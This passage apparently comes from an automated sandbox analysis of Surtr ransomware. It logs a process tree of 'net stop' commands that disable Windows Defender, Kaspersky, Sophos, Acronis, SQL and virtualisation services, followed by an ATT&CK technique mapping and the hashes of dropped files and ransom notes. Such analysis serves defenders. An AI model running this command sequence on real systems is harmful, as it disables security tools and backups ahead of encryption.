      4⤵
      PID:2664
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"
        5⤵
        
        PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AVP"
    3⤵
    PID:2732
  - - C:\Windows\system32\net.exe
      net stop "AVP"
      4⤵
      PID:1072
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AVP"
        5⤵
        
        PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "klnagent"
    3⤵
    PID:2092
  - - C:\Windows\system32\net.exe
      net stop "klnagent"
      4⤵
      PID:2264
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "klnagent"
        5⤵
        
        PID:520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"
    3⤵
    PID:1188
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SQLEXPRESS"
      4⤵
      PID:1008
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"
        5⤵
        
        PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"
    3⤵
    PID:3044
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SQLEXPRESS"
      4⤵
      PID:1752
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"
        5⤵
        
        PID:2576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "wbengine"
    3⤵
    PID:1160
  - - C:\Windows\system32\net.exe
      net stop "wbengine"
      4⤵
      PID:1804
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wbengine"
        5⤵
        
        PID:2448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "HvHost"
    3⤵
    PID:588
  - - C:\Windows\system32\net.exe
      net stop "HvHost"
      4⤵
      PID:2572
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "HvHost"
        5⤵
        
        PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"
    3⤵
    PID:2440
  - - C:\Windows\system32\net.exe
      net stop "vmickvpexchange"
      4⤵
      PID:2428
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmickvpexchange"
        5⤵
        
        PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"
    3⤵
    PID:2556
  - - C:\Windows\system32\net.exe
      net stop "vmicguestinterface"
      4⤵
      PID:2080
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicguestinterface"
        5⤵
        
        PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"
    3⤵
    PID:1740
  - - C:\Windows\system32\net.exe
      net stop "vmicshutdown"
      4⤵
      PID:2184
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicshutdown"
        5⤵
        
        PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"
    3⤵
    PID:2620
  - - C:\Windows\system32\net.exe
      net stop "vmicheartbeat"
      4⤵
      PID:1164
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicheartbeat"
        5⤵
        
        PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmcompute"
    3⤵
    PID:1052
  - - C:\Windows\system32\net.exe
      net stop "vmcompute"
      4⤵
      PID:2696
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmcompute"
        5⤵
        
        PID:3028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"
    3⤵
    PID:2636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicrdv"
    3⤵
    PID:1320
  - - C:\Windows\system32\net.exe
      net stop "vmicrdv"
      4⤵
      PID:2964
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicrdv"
        5⤵
        
        PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmictimesync"
    3⤵
    PID:2412
  - - C:\Windows\system32\net.exe
      net stop "vmictimesync"
      4⤵
      PID:3068
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmictimesync"
        5⤵
        
        PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicvss"
    3⤵
    PID:2504
  - - C:\Windows\system32\net.exe
      net stop "vmicvss"
      4⤵
      PID:1784
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicvss"
        5⤵
        
        PID:2684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"
    3⤵
    PID:2256
  - - C:\Windows\system32\net.exe
      net stop "VMAuthdService"
      4⤵
      PID:2956
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMAuthdService"
        5⤵
        
        PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"
    3⤵
    PID:2496
  - - C:\Windows\system32\net.exe
      net stop "VMnetDHCP"
      4⤵
      PID:2060
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMnetDHCP"
        5⤵
        
        PID:932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"
    3⤵
    PID:2156
  - - C:\Windows\system32\net.exe
      net stop "VMware NAT Service"
      4⤵
      PID:1660
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMware NAT Service"
        5⤵
        
        PID:792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"
    3⤵
    PID:2492
  - - C:\Windows\system32\net.exe
      net stop "VMUSBArbService"
      4⤵
      PID:2112
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMUSBArbService"
        5⤵
        
        PID:2108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"
    3⤵
    PID:2792
  - - C:\Windows\system32\net.exe
      net stop "VMwareHostd"
      4⤵
      PID:2400
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMwareHostd"
        5⤵
        
        PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sense"
    3⤵
    PID:2960
  - - C:\Windows\system32\net.exe
      net stop "Sense"
      4⤵
      PID:1100
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sense"
        5⤵
        
        PID:1288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"
    3⤵
    PID:1844
  - - C:\Windows\system32\net.exe
      net stop "WdNisSvc"
      4⤵
      PID:2804
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WdNisSvc"
        5⤵
        
        PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WinDefend"
    3⤵
    PID:1884
  - - C:\Windows\system32\net.exe
      net stop "WinDefend"
      4⤵
      PID:1540
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WinDefend"
        5⤵
        
        PID:2056

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "AcronisAgent"
1⤵
PID:2928

C:\Windows\system32\net.exe
net stop "MSSQL$SHAREPOINT"
1⤵
PID:1620
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"
  2⤵
  PID:1800

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SAVService"
1⤵
PID:1580

C:\Windows\system32\net.exe
net stop "SntpService"
1⤵
PID:204
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "SntpService"
  2⤵
  PID:1796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect"
1⤵
PID:1288

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Filesize
8KB

MD5
0ba48df23472ccac610fad892b8fdc02

SHA1
4b55aad8da65bcd636ff34ab60d1689f66884afb

SHA256
8b20fb2d193561e1cebf2f95aaf52826f3183d9b3f46d02712b6bab188475e8b

SHA512
cf2a4930ab332ac2e4738858338889e30b7cf84fa6cb94ffd097d642b68574ff753d6f2fa2c1a03933ac44324c69c27c08e053d370b0a83ba75430f0659d1de8

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt

Filesize
621B

MD5
1712d885db631a5061a57063cc80697a

SHA1
59090633e867906a892662c62511518d210cb0be

SHA256
a668846358688227cf612fa3982cadccfade257310206b26fbc80c5ad1de66d1

SHA512
aff58f7e79247227e5843da4ada134df484436917d9ad496a23f0e49db13f6303af1fc9d469aee845574faac3feba864d76314bc4fe57ad2a8d10a9e6b8a5dd4

Download Submit
C:\ProgramData\Service\ID_DATA.surt

Filesize
14B

MD5
2a335a88a6ea4b5896a3821a0162df1a

SHA1
4799d28cc2e69d45c7e4d8fb5ea95f312bbc20a6

SHA256
75958b70006aa2fe848f32e27b3c3e9c02a42bd3f5694f4ced5e62809634a412

SHA512
368a1fbd0e5dc2a498528283257e474ccd934d347f9869af472fb07b26116ae79e670dee77b22f6d87f3306778a32f8d741485e32b4f2f1d43be9aad17bb6355

Download Submit
C:\ProgramData\Service\Private_DATA.surt

Filesize
1KB

MD5
08d6326f8964788838bf9863c75e8bad

SHA1
ecd2df62dbf444e7ebb1cac0143a69b511c811d3

SHA256
de3dfe571b10590b2aa38510bb9c7421ab8d1a543f1d8b16ff46e21310eb7997

SHA512
cbf0407ede7df99c5faf884a31777092880cff867a6530edf7a7b82fa1a6f639c7fe57013a5403d174b635a75f0c85853eea5e04d9535901f8aafd78a5034c55

Download Submit
C:\ProgramData\Service\Public_DATA.surt

Filesize
204B

MD5
192ea6fd018ccec2ccc15d9f36730bd9

SHA1
d760d597c600665d1419c29243d9cc081a8a739a

SHA256
a0f032e3be25062cfe535906140deef2dd07229b3188ac3d42854cdd87fa101b

SHA512
203b4b861af3d659498069c2875603da7f097e910edb3828061863c482dbc64014dbce97ec500080b0556bbf0e822812e2efd01cd698bcf662ca4f252195a865

Download Submit
C:\ProgramData\Service\SURTR_README.hta

Filesize
8KB

MD5
0ba48df23472ccac610fad892b8fdc02

SHA1
4b55aad8da65bcd636ff34ab60d1689f66884afb

SHA256
8b20fb2d193561e1cebf2f95aaf52826f3183d9b3f46d02712b6bab188475e8b

SHA512
cf2a4930ab332ac2e4738858338889e30b7cf84fa6cb94ffd097d642b68574ff753d6f2fa2c1a03933ac44324c69c27c08e053d370b0a83ba75430f0659d1de8

Download Submit
C:\ProgramData\Service\SURTR_README.txt

Filesize
621B

MD5
1712d885db631a5061a57063cc80697a

SHA1
59090633e867906a892662c62511518d210cb0be

SHA256
a668846358688227cf612fa3982cadccfade257310206b26fbc80c5ad1de66d1

SHA512
aff58f7e79247227e5843da4ada134df484436917d9ad496a23f0e49db13f6303af1fc9d469aee845574faac3feba864d76314bc4fe57ad2a8d10a9e6b8a5dd4

Download Submit
C:\ProgramData\Service\Surtr.exe

Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
memory/1336-61-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/1336-62-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/1336-58-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/1336-54-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/1336-59-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/1336-97-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/1336-55-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/1336-63-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/1336-68-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download